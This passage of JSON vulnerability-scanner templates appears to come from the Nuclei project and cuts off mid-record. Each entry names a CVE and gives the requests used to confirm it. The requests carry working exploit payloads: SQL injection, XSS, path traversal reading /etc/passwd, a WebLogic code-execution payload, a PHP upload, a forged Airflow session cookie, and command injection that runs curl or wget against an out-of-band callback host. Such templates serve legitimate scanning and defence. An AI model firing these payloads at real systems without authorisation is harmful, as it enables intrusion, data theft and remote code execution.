Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=phpcredits"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"word","part":"header","words":["Nette Framework"]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate FAQ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": 